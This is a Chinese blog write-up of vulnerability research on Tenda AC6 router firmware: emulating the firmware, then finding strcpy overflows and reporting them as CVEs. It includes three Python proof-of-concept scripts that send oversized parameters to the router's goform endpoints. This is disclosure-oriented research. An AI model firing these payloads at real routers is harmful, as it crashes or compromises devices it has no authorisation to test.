tenda路由器漏洞挖掘(CVE-2025-0349)

于 2025-02-24 17:23:34 发布
阅读量2.2k 收藏 12
点赞数 26
文章标签: 智能路由器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/145833526
版权

tenda路由器漏洞挖掘

记录一下自己挖掘路由器的过程,漏洞技术含量不高,挖了几个溢出漏洞分配了CVE编号。

CVE-2025-0349
CVE-2025-25343

环境搭建

从官网上下载固件

版本:AC6 V15.03.05.16
https://www.tenda.com.cn/material/show/102661`
提取固件
binwalk -Me --run-as=root AC6V1.0BR_V15.03.05.16_multi_TD01.bin

查看软件架构 ARM架构

image.png

复制 qemu-arm-static 到当前目录

cp /usr/bin/qemu-arm-static .
创建br0网卡
sudo brctl addbr br0      # 添加一座名为 br0 的网桥
sudo brctl addif br0 ens33   # 在 br0 中添加一个接口
sudo ifconfig br0 up      # 启用 br0 接口
sudo dhclient br0         # 从 dhcp 服务器获得 br0 的 IP 地址
运行命令
sudo chroot ./ ./qemu-arm-static  ./bin/httpd_file

用ida打开,搜索WeLoveLinux

需要对 httpd 进行修改,模拟仿真环境,使用 ida工具MOV R3 R0 修改为MOV R3 #1,就可以了

image.png

成功搭建运行 tenda 路由器

image.png

webroot_ro 文件夹内容复制到 webroot 文件夹中

cp -r webroot_ro/* webroot/

image.png

formexeCommand 溢出漏洞

使用插件 https://github.com/Accenture/VulFi 搜索关键字,通过IDA插件快速挖掘溢出漏洞。

image.png

成功利用溢出漏洞


import requests

# 构造溢出载荷
def create_payload():
    # 假设 cmdinput 的目标缓冲区大小为 512 字节
    buffer_size = 51200
    
    # 填充 512 字节(覆盖 s 数组)
    payload = b"A" * buffer_size
    
    # 假设我们想覆盖 v11(4 字节,Little-endian 格式),填充目标数据
    # 举例:将 v11 设置为 0xdeadbeef
    v11_value = b"\xef\xbe\xad\xde"
    
    # 将溢出数据和 v11_value 拼接
    payload += v11_value
    
    return payload

# 构造 HTTP 请求并发送
def send_payload(url, payload):
    # 发送 GET 请求,带上恶意的 cmdinput 参数
    params = {'cmdinput': payload}
    
    response = requests.get(url, params=params)

    response = requests.get(url, params=params)
    
    # 打印响应内容
    print("Response status code:", response.status_code)
    print("Response body:", response.text)

if __name__ == "__main__":
    # 目标 URL
    url = "http://192.168.18.131/goform/exeCommand"
    
    # 创建恶意载荷
    payload = create_payload()
    
    # 发送恶意请求
    send_payload(url, payload)

image.png

GetParentControlInfo 函数 缓冲区溢出漏洞

image.png

在这段代码中,strcpy 被用来将 src 指向的字符串拷贝到 s 所指向的内存区域的偏移 2 处。问题出在这几点:

  1. 目标缓冲区大小不明确s 被分配了 0x254 字节的内存(596 字节),但 strcpy 并没有检查目标缓冲区的大小,而是直接将 src 的内容复制到 s + 2 位置。如果 src 字符串的长度超过了 s + 2 位置后可用的内存空间,strcpy 将会导致缓冲区溢出。

  2. 未验证 src 的大小src 是从 sub_2B7C4(a1, "mac", &unk_EA0EC) 获取的,未能确保该字符串不会超过 s + 2 偏移后的内存空间大小。如果 src 的长度过长,超出 s 分配的内存范围,strcpy 会写入超出边界的内存区域,导致溢出。

import requests

# 构造溢出载荷
def create_payload():
    
    buffer_size = 51200
    

    payload = b"A" * buffer_size
    
    v11_value = b"\xef\xbe\xad\xde"
    
    payload += v11_value
    
    return payload

# 构造 HTTP 请求并发送
def send_payload(url, payload):
    params = {'mac': payload}
    response = requests.get(url, params=params)
    response = requests.get(url, params=params)

    print("Response status code:", response.status_code)
    print("Response body:", response.text)

if __name__ == "__main__":
    # 目标 URL
    url = "http://192.168.18.131/goform/GetParentControlInfo"
    
    # 创建恶意载荷
    payload = create_payload()
    
    # 发送恶意请求
    send_payload(url, payload)

image.png

form_fast_setting_wifi_set 溢出漏洞

image.png

form_fast_setting_wifi_set 函数中 ,ssid 赋值给 srcsrc 是一个指向字符串的指针 char *src;

  src = (char *)sub_2B7C4(a1, "ssid", &unk_DFB94);
  strcpy(s, src);
  strcpy(dest, src);

strcpy 函数是一个不做边界检查的字符串复制函数,它会将 src 字符串复制到 sdest 缓冲区中,如果 src 字符串长度超过了 sdest 的大小(64 字节),就会发生溢出

image.png

跟踪 form_fast_setting_wifi_set 函数调用

image.png
image.png

image.png

知道了 form_fast_setting_wifi_set函数的路由 fast_setting_wifi_set

接下来直接用脚本跑就行

import requests

# 构造溢出载荷
def create_payload():
    buffer_size = 256

    payload = b"A" * buffer_size
    
    payload += b"B" * 128  
    return payload

# 构造 HTTP 请求并发送
def send_payload(url, payload):

    params = {'ssid': payload}
    
    response = requests.get(url, params=params)
    response = requests.get(url, params=params)
    
    # 打印响应内容
    print("Response status code:", response.status_code)
    print("Response body:", response.text)

if __name__ == "__main__":
    # 目标 URL
    url = "http://192.168.18.131/goform/fast_setting_wifi_set"
    
    payload = create_payload()
    
    send_payload(url, payload)

image.png

参考文章

tenda固件栈溢出漏洞挖掘和iot常用工具介绍和使用

Tenda AC15 栈溢出漏洞调试

【黑盒模糊测试】路由器固件漏洞挖掘实战--AFL++ qemu_mode
hollk’s blog
02-22 4048
在实际工作中,例如物联网、车联网固件文件系统中已经编译好的应用二进制程序来讲,我们关注的重点往往是厂商自己开发的应用程序是否会存在漏洞,这个时候就出现了无源码的binary-only(黑盒测试)情况
浅谈路由器漏洞挖掘(科普文)
Coisini的博客
06-16 4309
想在国内找一些路由渗透的纪实,但还是木有什么结果,就是今晚给国内某路由厂商提交一些漏洞时,还被人家鄙视了,哎。什么狗屁心态。不管了,留给我未来的 儿子玩吧。说不定可以搞出什么东西。呵呵,扯远了,今晚就结合国外的一些科普文做一些讲解吧。大牛别喷我,我也只是自己写写笔记意淫意淫….别喷! ++++++我是淫荡的分割线++++++++ 一,为什么要定义单独的路由安全? (1)对于渗透湿而言: 如今,更多...
路由器通用0day漏洞挖掘及RCE思路_0dayrce
最新发布
小司机的奥拓
02-20 889
近期tenda系列路由器频繁出现漏洞,下面以CVE-2023-27021漏洞为例,简要描述下对于刚入门IOT安全的人来说怎样去挖掘一个路由器的栈溢出漏洞,并深入利用实现RCE通常我们挖掘固件漏洞,首先要拿到固件,腾达官网提供用于更新的固件包,我们去官网下载固件即可。最可能容易发现漏洞的固件,可能是某些上一个更新版本比较早的固件,我们可以着重针对这些固件进行漏洞挖掘。AC15升级软件_下载中心_腾达(Tenda)官方网站网络安全产业就像一个江湖,各色人等聚集。
初试路由器漏洞挖掘
Quartz's Blog
11-19 5973
初探路由器漏洞挖掘参考文献 Exploiting Embedded Systems – Part 1 本次尝试完全是参照上文进行 , 作为初次的学习和了解 , 受益匪浅 So far our tutorials have focused on extracting file systems, kernels and code from firmware images. Once we hav
路由器漏洞挖掘技术
weixin_47065084的博客
09-03 721
要想完成这些任务中的任何一个,自动化分析工具都必须能够精确计算索引变量或指针的值的范围,追踪程序使用的用户输入的处理流程,并跟踪程序引用的所有变量的初始化代码。要想实现对二进制文件潜在漏洞审计的自动化,必须理解二进制文件是哪一种可执行文件格式,理解其使用的机器语言指令,并且能够通过对指令流和数据流的分析确定指令所执行的动作是否可被利用。这两种方法各有利弊。适用于用户数据输入类型的危险函数跟踪。跟踪常见的数据操作危险函数,反向跟踪函数参数的数据流向,找出源缓冲区和目的缓冲区,确定输入数据是否会造成安全漏洞
记第一次实战漏洞挖掘(路由器)
Pr0b1em的博客
01-16 1839
在程序运行时,系统会为程序在内存里生成一个固定空间,如果超过了这个空间,就会造成缓冲区溢出,可以导致程序运行失败系统宕机重新启动等后果。更为严重的是,甚至可以取得系统特权,进而进行各种非法操作。
僵尸网络的危害:主要目标是Linux服务器和物联网设备
12-16 380
一个新的可蠕虫僵尸网络通过GitHub和Pastebin进行了传播,以在目标系统上安装加密货币矿工和后门程序,并且已经返回了具有扩展功能的功能,可以破坏Web应用程序,IP摄像机和路由器。 上个月初,研究人员记录了一个名为“ Gitpaste-12 ”的加密采矿活动,该活动使用GitHub托管包含多达12个已知攻击模块的恶意代码,这些恶意代码通过从Pastebin URL下载的命令执行。 根据研究人员的说法,第二波攻击始于11月10日,使用的是来自另一个GitHub存储库的有效负载,其中包括一个Linux
盘点近年来的各国各行较知名的互联网安全事件
热门推荐
chengzengchi4787的博客
06-14 2万+
Manual 盘点近年来的各国各行较知名的数据泄露、供应链污染事件 数据泄露 2019 6月 中国猎头公司 FMC Consulting 配置错误的ElasticSearch集群造成数据泄露(据文章称涉事公司收到报告毫无反应,直到CNCERT出面才下线数据) 泄露内容:数百万份简历和公司记...
从零开始的二进制漏洞挖掘(1)路由器漏洞挖掘(去实战版)
Ba1_Ma0的博客
03-03 3336
从零开始的二进制漏洞挖掘(1)路由器漏洞挖掘(去实战版)
家用路由器漏洞挖掘工具和资源
07-22
路由器漏洞挖掘技术和资源
揭秘家用路由器0day漏洞挖掘技术.pdf
10-22
揭秘家用路由器0day漏洞挖掘技术.pdf 仅供用学习交流使用,不可用于商业用途,如有版权问题,请联系删除!
漏洞挖掘 | 从零开始的路由器漏洞挖掘之旅,从零基础到精通,收藏这篇就够了!
bdfcfff77fa的博客
02-11 1033
虽然目前已经有了很多很多路由器漏洞挖掘的文章资料,但是适合新手入门的、涉及环境配置细节的教学文章还是比较少,本文将带你一步步学习如何从零开始挖掘某厂商路由器漏洞,通过实际操作和工具使用,深入了解固件分析、动态调试和漏洞利用的全过程,希望可以帮助读者少走一些弯路。
漏洞挖掘 从零开始的路由器漏洞挖掘之旅,从零基础到精通,收藏这篇就够了!
韩束一叶子
02-06 1121
虽然目前已经有了很多很多路由器漏洞挖掘的文章资料,但是适合新手入门的、涉及环境配置细节的教学文章还是比较少,本文将带你一步步学习如何从零开始挖掘某厂商路由器漏洞,通过实际操作和工具使用,深入了解固件分析、动态调试和漏洞利用的全过程,希望可以帮助读者少走一些弯路。
路由器漏洞挖掘环境搭建
dnqykgfmq169340687的博客
06-28 534
详细的路由器漏洞分析环境搭建教程 http://chuansong.me/n/864762852648 嵌入式Linux固件模拟与安全分析系统Firmadyne交流 http://chuansong.me/n/1009525252762 oit : attify123 firmadyne:firmadyne 优秀博文: 路由器固件安全分析技术(一)   h...
【建议收藏】这个工具专门用于寻找路由器中的安全漏洞
yz_weixiao的博客
01-03 751
首先,通过这个工具,我找到了可能有漏洞的RCL/RUT函数,source点是函数的参数,sink点是system函数(或其变体)。然后,对该图进行相应的分析,以检测可能的安全漏洞,比如,如果(来自source点)用户输入到达一个危险的函数(即sink点),如system函数,我们就认为发现了一个潜在的安全漏洞。例如,在为待分析二进制代码中的每个函数设置了2分钟的超时的情况下,有时候即使经过了2小时,仍然无法完成对二进制文件的分析(因为如果一个函数没有漏洞,它将一直模拟执行下去,直到超时位置)。
路由器0day漏洞挖掘技术
Post Due To Vacuity
07-18 1019
【参考】 解密家用路由器0day漏洞挖掘技术
腾达路由器自定义功能开发-精易模块源码解析
资源摘要信息:"腾达路由器源码-易语言" 腾达路由器源码-易语言是一个专门针对腾达品牌的路由器固件进行二次开发的软件源码包。这份源码利用了易语言这一编程工具,它是一种简单易学、功能强大的编程语言,适用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值